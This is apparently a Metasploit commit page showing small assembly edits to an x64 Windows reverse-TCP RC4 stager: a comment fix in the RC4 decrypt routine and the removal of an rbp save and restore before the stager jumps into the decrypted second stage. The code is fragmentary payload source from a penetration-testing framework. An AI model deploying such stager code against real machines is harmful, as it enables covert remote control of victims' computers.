Implement Michael Schierl's suggestions

rapid7 · Feb 17, 2018 · 80779f7 · 80779f7
1 parent 354eb40
commit 80779f7
Show file tree

Hide file tree

Showing 2 changed files with 1 addition and 3 deletions.
diff --git a/lib/msf/core/payload/windows/x64/rc4.rb b/lib/msf/core/payload/windows/x64/rc4.rb
@@ -64,7 +64,7 @@ def asm_decrypt_rc4
          mov [r8+rax], dl
          add dl, [r8+rbx]      ; DL = S[AL]+S[BL]
          mov dl, [r8+rdx]      ; DL = S[DL]
-         xor [r9], dl          ; [EBP] ^= DL
+         xor [r9], dl          ; [R9] ^= DL
          inc r9                ; advance data pointer
          dec rcx                ; reduce counter
          jnz decrypt            ; until finished

diff --git a/lib/msf/core/payload/windows/x64/reverse_tcp_rc4.rb b/lib/msf/core/payload/windows/x64/reverse_tcp_rc4.rb
@@ -167,15 +167,13 @@ def asm_block_recv_rc4(opts={})
         pop rdi                 ; address of S-box
         pop rcx                 ; stage length
         pop r9                  ; address of stage
-        push rbp                ; push back so we can return into it
         push r14                ; save socket
         call after_key          ; Call after_key, this pushes the address of the key onto the stack.
         db #{raw_to_db(opts[:rc4key])}
       after_key:
         pop rsi                 ; rsi = RC4 key
       #{asm_decrypt_rc4}
         pop rdi                 ; restrore socket handle
-        pop rbp                 ; restore rbp
         jmp r15                 ; return into the second stage
     ^